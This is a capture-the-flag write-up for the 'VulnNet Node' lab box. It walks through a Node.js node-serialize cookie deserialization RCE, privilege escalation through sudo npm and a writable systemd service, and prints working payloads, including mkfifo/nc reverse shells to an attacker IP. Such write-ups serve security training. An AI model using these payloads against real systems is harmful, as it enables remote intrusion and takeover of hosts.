VulnNet Entertainment has moved its infrastructure and now they're confident that no breach will happen again. You're tasked to prove otherwise and penetrate their network.

# Tasks
1. user flag
2. root flag

# NMAP SCAN
```txt
PORT     STATE SERVICE VERSION   
8080/tcp open  http    Node.js Express framework                                                                                                                                                                                              
|_http-title: VulnNet &ndash; Your reliable news source &ndash; Try Now!                                                                                                                                                                      
|_http-open-proxy: Proxy might be redirecting requests
```

# Web (Port 8080)
## Findings
- Pure CSS
- We have a cookie when not logged in.
`eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D`
- Cookie is URL encoded and base64 encoded.
- Decoding it gives :
`{"username":"Guest","isGuest":true,"encoding": "utf-8"}`
- We can set our own cookies 
`{"username":"Admin","isGuest":true,"encoding": "utf-8"}`
- If we base64 and URL encode it, the server will accept it.
- But it doesn't log us in.
- And the login form doesn't seem to work either, so we probably aren't supposed to login.
- Since on the challenge it tells us about Javascript, let's search `js cookie to rce`
- Interesting result is `# Exploiting Node.js deserialization bug for Remote Code Execution`
- It's exploiting NodeJS deserialization? Let's check if we do have that in our page, let's try and break the page with the cookie.
`session=adadad'`
```html
SyntaxError: Unexpected token j in JSON at position 0<br> &nbsp; &nbsp;at JSON.parse (&lt;anonymous&gt;)<br> &nbsp; &nbsp;at Object.exports.unserialize (/home/www/VulnNet-Node/node_modules/node-serialize/lib/serialize.js:62:16)<br> &nbsp; &nbsp;at /home/www/VulnNet-Node/server.js:16:24<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/www/VulnNet-Node/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at next (/home/www/VulnNet-Node/node_modules/express/lib/router/route.js:137:13)<br> &nbsp; &nbsp;at Route.dispatch (/home/www/VulnNet-Node/node_modules/express/lib/router/route.js:112:3)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/www/VulnNet-Node/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at /home/www/VulnNet-Node/node_modules/express/lib/router/index.js:281:22<br> &nbsp; &nbsp;at Function.process_params (/home/www/VulnNet-Node/node_modules/express/lib/router/index.js:335:12)<br> &nbsp; &nbsp;at next (/home/www/VulnNet-Node/node_modules/express/lib/router/index.js:275:10)
```
And we can see some `serialize` keyword. So it is maybe vulnerable?

# Foothold
After testing a while, I can conclude that we don't have to include username, or anything. We can set our own keys and values. So let's copy from that page the payload.
```json
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
Let's make it shorter.
```json
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /',}()"}
```
This should work, let's try to netcat our box.
```json
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('nc 10.17.1.163 9001')}()"}
```
Remember to base64 the payload.
5 Seconds later we get a hit!
```http
connect to [10.17.1.163] from (UNKNOWN) [10.10.14.212] 42924
```
So now we know it works. Let's craft a payload for a reverse shell.
```json
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f')}()"}
```
Now we have a shell.
# Privilege Escalation
- We are user www-data
- No passwords found in server files.
- Check sudo -l
```bash
User www may run the following commands on vulnnet-node:  
   (serv-manage) NOPASSWD: /usr/bin/npm
```
- Can run binary npm with sudo with no password as serv-manage, possible privilege escalation.
- Check gtfobins for entry :
Additionally, arbitrary script names can be used in place of `preinstall` and triggered by name with, e.g., `npm -C $TF run preinstall`.
```bash
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
```
For this to work, we need to write to dierctory.
We'll work in /dev/shm
`echo '{"scripts": {"preinstall": "/bin/sh"}}' > /dev/shm/package.json`
Now when we run 
```bash
sudo -u serv-manage /usr/binnpm -C $TF --unsafe-perm i
```
It should create a package.json script in /dev/shm
Now we can trigger the script by using
`sudo -u serv-manage /usr/bin/npm -C /dev/shm i`
Now we are user serv-manage

# Privilege Escalation to Root
- Checking out sudo -l
```bash
User serv-manage may run the following commands on vulnnet-node:  
   (root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer  
   (root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer  
   (root) NOPASSWD: /bin/systemctl daemon-reload
```
If we have write permissions to that service, we can make it to change a binary or make a reverse shell.
Path to service :
`Loaded: loaded (/etc/systemd/system/vulnnet-auto.timer; disabled; vendor pres`
```bash
-rw-rw-r--  1 root serv-manage  167 Jan 24  2021 vulnnet-auto.timer
-rw-rw-r--  1 root serv-manage  197 Jan 24  2021 vulnnet-job.service
```
Our group has permission to write.
### vulnnet-auto.timer
```bash
[Unit]  
Description=Run VulnNet utilities every 30 min  
  
[Timer]  
OnBootSec=0min  
# 30 min job  
OnCalendar=*:0/30  
Unit=vulnnet-job.service  
  
[Install]  
WantedBy=basic.target
```
Now much we can do since there is no ExecStart
But it is being used by vulnnet-job.service

### vulnnet-job.service
```bash
[Unit]  
Description=Logs system statistics to the systemd journal  
Wants=vulnnet-auto.timer  
  
[Service]  
# Gather system statistics  
Type=forking  
ExecStart=/bin/df  
  
[Install]  
WantedBy=multi-user.target
```
It is running `/bin/df` we can change that to something malicious
Let's make it set /bin/bash as SUID
```bash
[Unit]  
Description=Logs system statistics to the systemd journal  
Wants=vulnnet-auto.timer  
  
[Service]  
# Gather system statistics  
Type=forking  
ExecStart=chmod 4777 /bin/bash  
  
[Install]  
WantedBy=multi-user.target
```
That doesn't seem to work, it errors out, since it's fetching commands from a binary, what if we make our file?
Let's make it run a reverse shell.
```bash
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f
```

```bash
[Unit]  
Description=Logs system statistics to the systemd journal  
Wants=vulnnet-auto.timer  
  
[Service]  
# Gather system statistics  
Type=forking  
ExecStart=/tmp/df
  
[Install]  
WantedBy=multi-user.target
```
Now when we run it, we get a shell back!

